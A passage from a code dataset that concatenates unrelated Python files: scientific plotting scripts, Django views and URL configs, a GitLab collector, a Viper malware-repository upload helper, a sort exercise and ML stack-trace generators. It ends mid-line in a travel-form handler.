plt.figure(101)\n\t\tplt.plot(CO2T, T, 'ro')\n\t\tplt.hold('on')\n\t\tplt.plot(CO2T, T_extrapolate(CO2T, *optimalParamsT), 'b-')\n\n\t\t# Visualize T as a function of time, and the extrapolation based on CO2 \n\t\t# levels.\n\t\tfig = plt.figure(102)\n\t\tplt.plot(yearT, T, 'r-')\n\t\tplt.hold('on')\n\t\ttmpCO2 = CO2_extrapolate(yearPlusT, *optimalParamsCO2)\n\t\tplt.plot(yearPlusT, T_extrapolate(tmpCO2, *optimalParamsT), 'b--')\n\n\t\tplt.show()\n\n\treturn \tyearT \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t, \\\n\t\t\tyearPlusT \t\t\t\t\t\t\t\t\t\t\t\t\t\t, \\\n\t\t\tyearCO2 \t\t\t\t\t\t\t\t\t\t\t\t\t\t, \\\n\t\t\tyearPlusCO2\t\t\t\t\t\t\t\t\t\t\t\t\t\t, \\\n\t\t\tT \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t, \\\n\t\t\tCO2 \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t, \\\n\t\t\tCO2_extrapolate(yearPlusCO2, *optimalParamsCO2) \t\t\t\t, \\\n\t\t\tT_extrapolate(CO2_extrapolate(yearPlusT, *optimalParamsCO2) \t, \\\n\t\t\t\t\t\t *optimalParamsT)\n\n\nif __name__ == \"__main__\" :\n\textrapolateCO2(month='June', plotting=True)\n\n\n\n\n\n\n\n","sub_path":"assignment6/temperaturePredicter.py","file_name":"temperaturePredicter.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"18013366","text":"\"\"\"Show frbpoppy matches analytical models and predict the event rates.\"\"\"\nfrom matplotlib.lines import Line2D\nfrom matplotlib.patches import Patch\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom convenience import plot_aa_style, rel_path\nfrom rates_complex import complex_rates\nfrom rates_real import real_rates\nfrom rates_simple import simple_rates\nfrom rates_toy import toy_rates\n\nREMAKE = False\nSIZE = 1e8\nSURVEYS = ('palfa', 'htru', 'askap-fly', 'askap-incoh')\nALPHAS = np.around(np.linspace(-0.2, -2.5, 7), decimals=2)\n\n\ndef plot(toy, simple, complex, real):\n \"\"\"Plot rates panel.\"\"\"\n surveys = SURVEYS[:-1]\n\n plot_aa_style(cols=2)\n fig, (ax1, ax2) = plt.subplots(1, 2, sharey=True)\n cmap = plt.get_cmap('tab10')\n ax1.set_xlim((min(ALPHAS)+.1, max(ALPHAS)-.1))\n 
ax2.set_xlim((min(ALPHAS)+.1, max(ALPHAS)-.1))\n ax1.set_yscale('log', nonposy='mask')\n ax2.set_yscale('log', nonposy='mask')\n\n # Plot simple versus toy\n for i, surv in enumerate(surveys):\n ax1.plot(ALPHAS, toy[surv], color=cmap(i), linestyle='dotted',\n zorder=0)\n ax1.plot(ALPHAS, simple[surv], zorder=1)\n\n # Plot complex expectations\n for i, surv in enumerate(surveys):\n ax2.plot(ALPHAS, complex[surv], color=cmap(i), linestyle='dashed',\n zorder=1)\n\n # Plot real event rate boxes\n ma, mi = ax2.get_xlim()\n ma -= 0.05\n mi += 0.05\n size = 0.13\n z = 0\n for i, surv in enumerate(surveys):\n\n central, min_r, max_r = real[surv]\n\n left = mi - size\n right = ma + size\n\n x, y = zip(*[(ma, max_r), (right, max_r), (right, min_r), (ma, min_r)])\n ax1.fill(x, y, color=cmap(i), zorder=z)\n ax1.plot([ma, right+0.08], [central, central], color=cmap(i), zorder=z)\n\n x, y = zip(*[(mi, max_r), (left, max_r), (left, min_r), (mi, min_r)])\n ax2.fill(x, y, color=cmap(i), zorder=z)\n ax2.plot([mi, left-0.08], [central, central], color=cmap(i), zorder=z)\n\n size -= 0.02\n z += 1\n\n # Plot layout options\n # Set up axes\n ax1.set_xlabel(r'$\\alpha_{\\text{in}}$')\n ax1.invert_xaxis()\n ax1.set_ylabel('Events / htru')\n ax1.yaxis.set_ticks_position('left')\n ax1.title.set_text(r'\\textit{Simple} populations')\n\n ax2.set_xlabel(r'$\\alpha_{\\text{in}}$')\n ax2.invert_xaxis()\n ax2.yaxis.set_ticks_position('right')\n ax2.tick_params(labelright=False)\n ax2.title.set_text(r'\\textit{Complex} populations')\n\n # Set up layout options\n fig.subplots_adjust(hspace=0)\n fig.subplots_adjust(wspace=0)\n\n # Add legend elements\n elements = []\n for i, surv in enumerate(surveys):\n c = cmap(i)\n line = Line2D([0], [0], color=c)\n label = surv\n elements.append((line, label))\n\n # Add gap in legend\n elements.append((Line2D([0], [0], color='white'), ''))\n\n # Add line styles\n n = 'analytical'\n elements.append((Line2D([0], [0], color='gray', linestyle='dotted'), n))\n elements.append((Line2D([0], [0], color='gray'), 'simple'))\n elements.append((Line2D([0], [0], color='gray', linestyle='dashed'),\n 'complex'))\n\n # Add gap in legend\n elements.append((Line2D([0], [0], color='white'), ''))\n\n elements.append((Patch(facecolor='gray', edgecolor='gray', alpha=0.6),\n 'real'))\n\n lines, labels = zip(*elements)\n plt.legend(lines, labels, bbox_to_anchor=(1.04, 0.5), loc=\"center left\")\n\n plt.savefig(rel_path('plots/rates.pdf'), bbox_inches='tight')\n\n\ndef main():\n \"\"\"Get rates.\"\"\"\n toy = toy_rates(surveys=SURVEYS,\n alphas=ALPHAS)\n\n simple = simple_rates(remake=REMAKE,\n alphas=ALPHAS,\n size=SIZE,\n surveys=SURVEYS)\n\n complex = complex_rates(remake=REMAKE,\n alphas=ALPHAS,\n size=SIZE,\n surveys=SURVEYS)\n\n real = real_rates(surveys=SURVEYS)\n\n plot(toy, simple, complex, real)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tests/rates.py","file_name":"rates.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"395567793","text":"\"\"\"timetable URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. 
Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\n\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\",views.home,name=\"home\"),\n path(\"register/\",views.register,name=\"register\"),\n path(\"register1/\",views.register1,name=\"register1\"),\n path(\"login/\",views.login,name=\"login\"),\n path(\"login1/\",views.login1,name=\"login1\"),\n path(\"college_details/\",views.college_details,name=\"college_details\"),\n path(\"success/\",views.success,name=\"success\"),\n\n\n]\n","sub_path":"timetable/institute/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"560368229","text":"from __future__ import print_function\nfrom googleapiclient.discovery import build\nfrom login import login\nfrom sheets import *\nfrom SheetCommand import SheetCommand\nfrom scopes import SPREADSHEETS_READONLY_SCOPE\n\n# ID and range of the spreadsheet\nSPREADSHEET_ID = MUSIC_SHEET\nRANGE_NAME = 'metal!B:B'\n\n\ndef print_songs_list():\n creds = login(SPREADSHEETS_READONLY_SCOPE)\n service = build('sheets', 'v4', credentials=creds)\n sheet_command = SheetCommand(service)\n result = sheet_command.get_values(SPREADSHEET_ID, RANGE_NAME)\n values = result.get('values', [])\n if not values:\n print('No data found.')\n else:\n print('Songs:')\n for row in values:\n print('%s' % (row[0]))\n","sub_path":"app/printSongsList.py","file_name":"printSongsList.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"410308532","text":"\"\"\"GitLab source up-to-dateness collector.\"\"\"\n\nimport asyncio\nimport itertools\nfrom urllib.parse import quote\n\nfrom dateutil.parser import parse\n\nfrom collector_utilities.functions import days_ago\nfrom collector_utilities.type import URL, Value\nfrom source_model import SourceResponses\n\nfrom .base import GitLabBase\n\n\nclass GitLabSourceUpToDateness(GitLabBase):\n \"\"\"Collector class to measure the up-to-dateness of a repo or folder/file in a repo.\"\"\"\n\n async def _api_url(self) -> URL:\n \"\"\"Override to return the API URL.\"\"\"\n return await self._gitlab_api_url(\"\")\n\n async def _landing_url(self, responses: SourceResponses) -> URL:\n \"\"\"Override to return a landing URL for the folder or file.\"\"\"\n if not responses:\n return await super()._landing_url(responses)\n web_url = (await responses[0].json())[\"web_url\"]\n branch = self._parameter(\"branch\", quote=True)\n file_path = self._parameter(\"file_path\", quote=True)\n return URL(f\"{web_url}/blob/{branch}/{file_path}\")\n\n async def _get_source_responses(self, *urls: URL) -> SourceResponses:\n \"\"\"Get the last commit metadata of the file or, in case of a folder, of the files in the folder, recursively.\"\"\"\n # First, get the project info so we can use the web url as landing url\n responses = await super()._get_source_responses(*urls)\n # Then, collect the commits\n responses.extend(await self.__get_commits_recursively(str(self._parameter(\"file_path\", quote=True))))\n return responses\n\n async def __get_commits_recursively(self, file_path: str, first_call: bool = True) -> SourceResponses:\n \"\"\"Get the commits of files recursively.\"\"\"\n tree_api = await 
self._gitlab_api_url(\n f\"repository/tree?path={file_path}&ref={self._parameter('branch', quote=True)}\"\n )\n tree_response = (await super()._get_source_responses(tree_api))[0]\n tree = await tree_response.json()\n file_paths = [quote(item[\"path\"], safe=\"\") for item in tree if item[\"type\"] == \"blob\"]\n folder_paths = [quote(item[\"path\"], safe=\"\") for item in tree if item[\"type\"] == \"tree\"]\n if not tree and first_call:\n file_paths = [file_path]\n commits = [self.__last_commit(file_path) for file_path in file_paths] + [\n self.__get_commits_recursively(folder_path, first_call=False) for folder_path in folder_paths\n ]\n return SourceResponses(responses=list(itertools.chain(*(await asyncio.gather(*commits)))))\n\n async def __last_commit(self, file_path: str) -> SourceResponses:\n \"\"\"Return the last, meaning the most recent, commit.\"\"\"\n files_api_url = await self._gitlab_api_url(\n f\"repository/files/{file_path}?ref={self._parameter('branch', quote=True)}\"\n )\n response = await self._session.head(files_api_url, headers=self._headers())\n last_commit_id = response.headers[\"X-Gitlab-Last-Commit-Id\"]\n commit_api_url = await self._gitlab_api_url(f\"repository/commits/{last_commit_id}\")\n return await super()._get_source_responses(commit_api_url)\n\n async def _parse_value(self, responses: SourceResponses) -> Value:\n \"\"\"Override to parse the dates from the commits.\"\"\"\n commit_responses = responses[1:]\n return str(days_ago(max([parse((await response.json())[\"committed_date\"]) for response in commit_responses])))\n","sub_path":"components/collector/src/source_collectors/gitlab/source_up_to_dateness.py","file_name":"source_up_to_dateness.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"470256292","text":"import sys\n\nsys.stdin = open('input.txt', 'r')\n\n\ndef the_largest(arr, last):\n largest = last\n for i in range(0, last + 1):\n if arr[i] > arr[largest]:\n largest = i\n\n return largest\n\n\ndef selection_sort(arr, n): # 정렬할 배열, 개수\n for last in range(n - 1, 0, -1): # 처음엔 n-1까지, 한번정렬 후 n-2까지, ..\n\n # arr[1..last] 중 가장 큰 수 arr[k]를 찾는다.\n k = the_largest(arr, last)\n # 두 값을 교환한다\n arr[last], arr[k] = arr[k], arr[last]\n\n return arr\n\n\nN = int(input())\n\nnumbers = [int(input()) for _ in range(N)]\n\nselection_sort(numbers, len(numbers))\n\nfor num in numbers:\n print(num)\n","sub_path":"PYTHON/BAEKJOON/2750_수_정렬하기(버블,선택,삽입)/2750_selection.py","file_name":"2750_selection.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"518944950","text":"#!/usr/bin/python\nfrom ConfigUtils import getBaseConfig\nfrom LogUtils import getModuleLogger\nfrom requests_toolbelt.multipart.encoder import MultipartEncoder\nfrom urlparse import urlparse\nfrom UserString import MutableString\nimport json\nimport os\nimport requests\nimport sys\nimport time\n\ncDir = os.path.dirname(os.path.realpath(__file__))\nrootDir = os.path.abspath(os.path.join(cDir, os.pardir))\nbaseConfig = getBaseConfig(rootDir)\nlogging = getModuleLogger(__name__)\n\ndef uploadToViper(filePath, fileName, tags):\n rawFile = open(filePath, 'rb')\n\n try:\n files = {'file': (fileName, rawFile)}\n tags = {'tags': tags}\n headers = {'User-agent': baseConfig.userAgent}\n \n logging.info(\"Adding to Viper: {0}\".format(fileName))\n\n response = requests.post(baseConfig.viperUrlAdd, headers=headers, files=files, 
data=tags)\n\n        if response.status_code == 200:\n            responsejson = json.loads(response.content)\n            logging.info(\"Submitted to Viper, message: {0}\".format(responsejson[\"message\"]))\n            return True\n\n        else:\n            logging.warning(\"Problem submitting {0} to Viper. Status code: {1}. Continuing.\".format(fileName, response.status_code))\n            return False\n\n    except Exception as e:\n        logging.warning(\"Problem submitting {0} to Viper. Continuing.\".format(fileName))\n        logging.exception(sys.exc_info())\n        logging.exception(type(e))\n        logging.exception(e.args)\n        logging.exception(e)\n        return False\n        #sys.exit(1)\n\ndef getTags(fileHash, url, agent, urlHash=None):\n    tags = MutableString()\n\n    tags += fileHash\n    tags += \",\"\n    tags += urlparse(url).hostname\n    tags += \",\"\n    tags += url\n    tags += \",\"\n\n    if not urlHash == None:\n        tags += urlHash\n        tags += \",\"\n\n    tags += time.strftime(baseConfig.dateFormat)\n    tags += \",\"\n    tags += agent\n\n    logging.debug(\"tags={0}\".format(tags))\n\n    return str(tags)\n\ndef isNewEntry(fileHash=None,urlHash=None):\n\n    if not fileHash == None:\n        params = { 'md5': fileHash.lower(), 'project': 'default' }\n\n    if not urlHash == None:\n        # Viper tags are all lowercase - for now.\n        params = { 'tag': urlHash.lower(), 'project': 'default' }\n\n    try:\n        userAgent = {'User-agent': baseConfig.userAgent}\n\n        response = requests.post(baseConfig.viperUrlFind, data=params, headers=userAgent)\n\n        if not response.status_code == 200:\n            if response.status_code == 400:\n                logging.warning(\"400 Invalid Search Term: ({0})\".format(str(params)))\n                return False\n            else:\n                logging.warning(\"Unable to perform HTTP request to Viper (HTTP code={0})\".format(response.status_code))\n                return False\n    except Exception as e:\n        raise Exception(\"Unable to establish connection to Viper: {0}\".format(e))\n        return False\n\n    try:\n        check = json.loads(response.content)\n\n        if check['results']:\n            check = check['results']\n        else:\n            logging.warning(\"Results key not present in JSON response.\")\n            return False\n\n    except ValueError as e:\n        raise Exception(\"Unable to convert response to JSON: {0}\".format(e))\n        return False\n\n    for i in check:\n        if str(i) == \"../\":\n            return False\n        if str(i) == \"default\":\n            for v in check[i]:\n                if not fileHash == None:\n                    if v['md5'] == fileHash:\n                        logging.info(\"File with hash: {0} is in Viper\".format(fileHash))\n                        return False\n                if not urlHash == None:\n                    if urlHash in v['tags']:\n                        logging.info(\"URL with hash: {0} is in Viper\".format(urlHash))\n                        return False\n    if not fileHash == None:\n        logging.info(\"File with hash {0} is not in Viper\".format(fileHash))\n        return True\n    if not urlHash == None:\n        logging.info(\"URL with hash {0} is not in Viper\".format(urlHash))\n        return True\n    return False\n\n","sub_path":"util/ViperUtils.py","file_name":"ViperUtils.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"347486340","text":"import asl\nfrom mniststack import *\nimport torch\nimport common\nimport os\nfrom asl.loss import mean\n\n## Traces\n## ======\n\ndef tracegen1(nitems, nrounds):\n  def trace1(items, r, runstate, push, pop, empty):\n    \"\"\"Push push push, pop pop pop\"\"\"\n    asl.log_append(\"empty\", empty)\n    stack = empty\n    for nr in range(nrounds):\n      for i in range(nitems):\n        (stack,) = push(stack, next(items))\n        asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n\n      for j in range(nitems):\n        (stack, pop_item) = pop(stack)\n        asl.observe(pop_item, 
\"pop.{}.{}\".format(nr, j), runstate)\n        asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n    \n    return pop_item\n  \n  return trace1\n\n\ndef tracegen2(nitems, nrounds):\n  def trace2(items, r, runstate, push, pop, empty):\n    \"\"\"Push Pop Push Push Pop Pop Push Push Push Pop Pop Pop\"\"\"\n    asl.log_append(\"empty\", empty)\n    stack = empty\n    for nr in range(nrounds):\n      for i in range(nitems):\n        (stack,) = push(stack, next(items))\n        asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n        pop_stack = stack\n        for j in range(i, -1, -1):\n          (pop_stack, pop_item) = pop(pop_stack)\n          asl.log_append(\"{}/internal\".format(runstate['mode']), pop_stack)\n          asl.observe(pop_item, \"pop.nr{}.i{}.j{}\".format(nr, i, j), runstate)\n    return pop_item\n  \n  return trace2\n\n\ndef tracegen3(nitems, nrounds):\n  def trace3(items, r, runstate, push, pop, empty):\n    \"\"\"Pushes n items, to create n stacks, pops from random one\"\"\"\n    asl.log_append(\"empty\", empty)\n    stack = empty\n    for nr in range(nrounds):\n      stacks = []\n      for i in range(nitems):\n        (stack, ) = push(stack, next(items))\n        asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n        stacks.append(stack)\n\n      stack = r.choice(stacks)\n      asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n      (stack, pop_item) = pop(stack)\n      asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n      asl.observe(pop_item, \"pop.nr{}\".format(nr), runstate)\n  \n  return trace3\n\n\ndef tracegen4(nitems, nrounds):\n  def trace4(items, r, runstate, push, pop, empty):\n    \"\"\"Pushes n items, to create n stacks, pops from random one\"\"\"\n    asl.log_append(\"empty\", empty)\n    stack = empty\n    for nr in range(nrounds):\n      stacks = []\n      for i in range(nitems):\n        (stack, ) = push(stack, next(items))\n        asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n        stacks.append(stack)\n\n      (stack, pop_item) = pop(stack)\n      asl.observe(pop_item, \"pop.nr{}.i{}\".format(nr, i), runstate)\n      asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n\n  return trace4\n\n\ndef tracegen5(nitems, nrounds):\n  def trace5(items, r, runstate, push, pop, empty):\n    \"\"\"Make n random choices over whether to push or pop\"\"\"\n    asl.log_append(\"empty\", empty)\n    stack = empty\n    stack_size = 0\n    choicesperround = nitems\n    for nr in range(nrounds * choicesperround):\n      if stack_size == 0:\n        (stack, ) = push(stack, next(items))\n        stack_size = stack_size + 1\n      elif stack_size == nitems:\n        (stack, pop_item) = pop(stack)\n        asl.observe(pop_item, \"pop.nr{}\".format(nr), runstate)\n        stack_size = stack_size - 1\n      else:\n        dopush = r.choice([True, False])\n        if dopush:\n          (stack, ) = push(stack, next(items))\n          stack_size = stack_size + 1\n        else:\n          (stack, pop_item) = pop(stack)\n          asl.observe(pop_item, \"pop.nr{}\".format(nr), runstate)\n          stack_size = stack_size - 1\n\n    # Final pop to make sure we get some data\n    if stack_size > 0:\n      (stack, pop_item) = pop(stack)\n      asl.observe(pop_item, \"pop.final\", runstate) \n    asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n\n  return trace5\n\n\ndef tracegen6(nitems, nrounds):\n  def trace6(items, r, runstate, push, pop, empty):\n    \"\"\"Pushes n items, to create n stacks, pops randnum times, then observe once\"\"\"\n    asl.log_append(\"empty\", empty)\n    stack = empty\n    for nr in range(nrounds):\n      stacks = []\n      for i in range(nitems):\n        (stack, ) = push(stack, next(items))\n        asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n        stacks.append(stack)\n\n      npops = r.randint(1, nitems)\n      for j in 
range(npops):\n (stack, pop_item) = pop(stack)\n asl.log_append(\"{}/internal\".format(runstate['mode']), stack)\n \n asl.observe(pop_item, \"pop.nr{}\".format(nr), runstate)\n \n return trace6\n\n## Hyper Params\n## ============\n\nimport numpy as np\nimport random\nimport torch.nn.functional as F\nfrom torch import optim\n\ndef optim_sampler():\n lr = random.choice([0.001, 0.0001, 0.00001])\n optimizer = random.choice([optim.Adam])\n return {\"optimizer\": optimizer,\n \"lr\": lr}\n\ndef conv_hypers(pbatch_norm=0.5, max_layers=6):\n \"Sample hyper parameters\"\n learn_batch_norm = np.random.rand() > 0.5\n nlayers = np.random.randint(2, max_layers)\n h_channels = random.choice([4, 8])\n act = random.choice([F.elu])\n last_act = random.choice([F.elu])\n ks = random.choice([3])\n arch_opt = {'batch_norm': True,\n 'h_channels': 2,\n 'activation': F.relu,\n 'ks': ks,\n 'nblocks': 1, \n 'last_activation': last_act,\n 'learn_batch_norm': False,\n 'padding': (ks - 1)//2}\n return {\"arch\": asl.archs.conv_res_net.ConvResNet,\n \"arch_opt\": arch_opt}\n\ndef stack_optspace(): \n return {\"tracegen\": [tracegen1, tracegen2, tracegen3, tracegen4, tracegen5],\n \"nrounds\": [2, 1],\n \"dataset\": \"mnist\",\n \"nchannels\": 1,\n \"nitems\": [3, 5],\n \"normalize\": True,\n \"batch_size\": [16, 32],\n \"learn_constants\": True,\n \"accum\": mean,\n \"init\": [torch.nn.init.uniform,\n torch.nn.init.normal],\n \"arch_opt\": conv_hypers,\n \"optim_args\": optim_sampler}\n\ndef traces_gen(nsamples):\n # Delaying computation of this value because we dont know nsamples yet\n return asl.prodsample(stack_optspace(),\n to_enum=[\"tracegen\", \"nrounds\", \"nitems\"],\n to_sample=[\"init\",\n \"batch_size\"],\n to_sample_merge=[\"arch_opt\", \"optim_args\"],\n nsamples=nsamples)\n\nif __name__ == \"__main__\":\n thisfile = os.path.abspath(__file__)\n res = common.trainloadsave(thisfile, train_stack, traces_gen, stack_args)","sub_path":"aslbench/test_res_net.py","file_name":"test_res_net.py","file_ext":"py","file_size_in_byte":6586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"270610604","text":"from rest_framework.routers import DefaultRouter\n\nfrom . 
views import admin, manage\nfrom django.conf.urls import url\n\n\nrouter = DefaultRouter()\nrouter.register(r'trader', manage.TraderViewSet, base_name='trader')\n\n\nurlpatterns = [\n    url(r'^admin/login/$', admin.login_view())\n]","sub_path":"trader/core/manage_urls.py","file_name":"manage_urls.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"7382417","text":"from django.shortcuts import render, HttpResponseRedirect\nfrom django.urls import reverse\n# views here\nfrom .models import Cart, CartItem\nfrom products.models import Product, Variations\nfrom django.contrib.auth.decorators import login_required\n\ndef cart_view(request):\n    try:\n        the_id = request.session['cart_id']\n    except:\n        the_id = None\n    if the_id:\n        cart = Cart.objects.get(id = the_id)\n        context = {'cart':cart}\n        new_total = 0.00\n        for item in cart.cartitem_set.all():\n            line_total = float(item.product.price) * item.quantity\n            new_total += line_total\n        request.session['cart_items_count'] = cart.cartitem_set.count()\n        cart.total = new_total\n        cart.save()\n    else:\n        empty_message = \"Your cart is empty, please keep shoping \"\n        context = {'empty':True,'empty_message':empty_message}\n    template = 'cart/cart_view.html'\n    return render(request,template, context)\n\ndef remove_from_cart(request, id):\n    try:\n        the_id = request.session['cart_id']\n    except Exception as e:\n        return HttpResponseRedirect(reverse('cart'))\n\n    cart_item = CartItem.objects.get(id=id)\n    # cart_item.delete()\n    cart_item.cart = None\n    cart_item.save()\n    return HttpResponseRedirect(reverse('cart'))\n\n@login_required\ndef add_to_cart(request, slug):\n    try:\n        the_id = request.session['cart_id']\n    except:\n        new_cart = Cart()\n        new_cart.save()\n        request.session['cart_id'] = new_cart.id\n        the_id = new_cart.id\n    cart = Cart.objects.get(id = the_id)\n    try:\n        product = Product.objects.get(slug = slug)\n    except Product.DoesNotExist:\n        pass\n    except:\n        pass\n    product_vars = []\n    if request.method == 'POST':\n        qty = request.POST['qty']\n        if int(qty) >= 0:\n            for item in request.POST:\n            \n                key = item\n                val = request.POST[key]\n                print(key,val)\n                try:\n                    v = Variations.objects.get(product = product, category__iexact= key, title__iexact =val)\n                    product_vars.append(v)\n                except:\n                    pass\n            cart_item = CartItem.objects.create(cart = cart,product=product) \n            if len(product_vars) >0 : \n                cart_item.variations.add(*product_vars)\n            cart_item.quantity = qty\n            cart_item.save()\n            return HttpResponseRedirect(reverse('cart'))\n    return HttpResponseRedirect(reverse('cart'))\n","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"196423389","text":"from django.shortcuts import render\nfrom .models import SearchQuery\nfrom blogs.models import Post\nfrom support.models import Question\nfrom itertools import chain\n# Create your views here.\n\nfrom django.views.generic import ListView\n\n\nclass SearchView(ListView):\n    template_name = 'searches/view.html'\n    # paginate_by = 1\n    count = 0\n\n    def get_context_data(self, *args, **kwargs):\n        context = super().get_context_data(*args, **kwargs)\n        context['count'] = self.count or 0\n        context['query'] = self.request.GET.get('q')\n        return context\n\n    def get_queryset(self):\n        request = self.request\n        query = request.GET.get('q', None)\n        print(query)\n        if query is not None:\n            # blog_results = Post.objects.search(query)\n            question_results = 
Question.objects.search(query)\n # lesson_results = Lesson.objects.search(query)\n # profile_results = Profile.objects.search(query)\n\n # combine querysets\n queryset_chain = chain(\n # blog_results,\n question_results\n )\n qs = sorted(queryset_chain,\n key=lambda instance: instance.pk,\n reverse=True)\n self.count = len(qs) # since qs is actually a list\n # print(qs)\n return qs\n # empty_qs = Post.objects.none() or Question.objects.none()\n empty_qs = Question.objects.none()\n return empty_qs # just an empty queryset as default\n\n\ndef search_query(request):\n query = request.GET.get('q', None)\n # print(query)\n user = None\n if request.user.is_authenticated:\n user = request.user\n context = {\n 'query': query\n }\n if query is not None:\n SearchQuery.objects.create(user=user, query=query)\n blog_list = Post.objects.search(query=query)\n blog_list = blog_list.distinct()\n # print(blog_list)\n context['blog_list'] = blog_list\n # print(context)\n return render(request, 'searches/view.html', context)\n","sub_path":"searches/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"57424420","text":"import datetime\nimport os\nimport jinja2\nimport webapp2\n\n\nfrom google.appengine.ext import db\n\n\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'templates')\njinja_env = jinja2.Environment(loader=jinja2.FileSystemLoader(template_dir), autoescape=True)\n\nvalid_months = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\",\n \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"]\nvalid_years = [2011, 2012]\nfuzzy_times = [\"anytime\", \"morning\", \"noon\", \"evening\", \"late night\"]\ndefaults = {\n \"title\" : \"Travel Form\",\n \"months\": valid_months,\n \"years\" : valid_years,\n \"times\" : fuzzy_times,\n}\n\nclass TravelForm(db.Model):\n created = db.DateTimeProperty(auto_now_add=True)\n from_city = db.StringProperty(required=True)\n to_city = db.StringProperty(required=True)\n start_date = db.DateProperty(required=True)\n return_date = db.DateProperty(required=True)\n fuzzy_start_time = db.StringProperty(required=True, choices=fuzzy_times)\n fuzzy_end_time = db.StringProperty(required=True, choices=fuzzy_times)\n num_passengers = db.IntegerProperty(default=1,\n required=True,\n validator= lambda x: 1 <= x <= 12)\n\n\nclass Handler(webapp2.RequestHandler):\n def write(self, *args, **kwargs):\n self.response.out.write(*args, **kwargs)\n\n def render_str(self, template, **params):\n t = jinja_env.get_template(template)\n return t.render(params)\n\n def render(self, template, **kwargs):\n self.write(self.render_str(template, **kwargs))\n\n\nclass MainHandler(Handler):\n def get(self):\n self.render(\"index.html\", **defaults)\n\n def post(self):\n from_city = self.request.get(\"from_city\")\n to_city = self.request.get(\"to_city\")\n\n from_date = self.request.get(\"from_date\")\n from_month = self.request.get(\"from_month\")\n from_year = self.request.get(\"from_year\")\n\n to_date = self.request.get(\"to_date\")\n to_month = self.request.get(\"to_month\")\n to_year = self.request.get(\"to_year\")\n\n from_time = self.request.get(\"from_time\")\n to_time = self.request.get(\"to_time\")\n num_passengers = self.request.get(\"num_passengers\")\n\n obtained_values = {\n 'from_city' : from_city,\n 'to_city' : to_city,\n 'from_date' : from_date,\n 'from_month' : from_month,\n 'from_year': from_year,\n 'to_date' : 
to_date,\n 'to_month': to_month,\n 'to_year' : to_year,\n 'from_time' : from_time,\n 'to_time' : to_time,\n 'num_passengers' : num_passengers\n }\n\n if not from_city or not to_city:\n if not from_city:\n error = \"Please provide your boarding (From) city\"\n else:\n error = \"Please provide your destination (To) city\"\n error_form_details = {\n \"city_error\" : error\n }\n error_form_details.update(obtained_values)\n error_form_details.update(defaults)\n self.render(\"index.html\", **error_form_details)\n return\n\n\n try:\n from_datetime_date = datetime.date(day=int(from_date), month=int(from_month), year=int(from_year))\n except ValueError:\n error = \"Please verify the Departure Date. It looks invalid.\"\n\n error_form_details = {\n \"from_date_error\": error\n }\n error_form_details.update(obtained_values)\n error_form_details.update(defaults)\n self.render(\"index.html\", **error_form_details)\n return\n try:\n to_datetime_date = datetime.date(day=int(to_date), month=int(to_month), year=int(to_year))\n except ValueError:\n error = \"Please verify the Return Date. It looks invalid.\"\n error_form_details = {\n \"to_date_error\": error\n }\n error_form_details.update(obtained_values)\n error_form_details.update(defaults)\n self.render(\"index.html\", **error_form_details)\n return\n\n if to_datetime_date < from_datetime_date:\n error = \"Return Date should be greater than Departure Date. (Unless you are a time traveller!)\"\n error_form_details = {\n \"date_error\": error\n }\n error_form_details.update(obtained_values)\n error_form_details.update(defaults)\n self.render(\"index.html\", **error_form_details)\n return\n elif to_datetime_date == from_datetime_date:\n values_compare = {}\n for index, value in enumerate(fuzzy_times):\n values_compare[value] = index\n\n if values_compare[from_time] and values_compare[to_time]:\n if 